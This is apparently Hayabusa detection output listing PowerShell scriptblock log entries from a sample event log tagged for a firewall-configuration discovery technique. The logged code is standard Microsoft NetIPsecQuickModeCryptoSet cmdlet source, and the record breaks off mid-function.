+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = 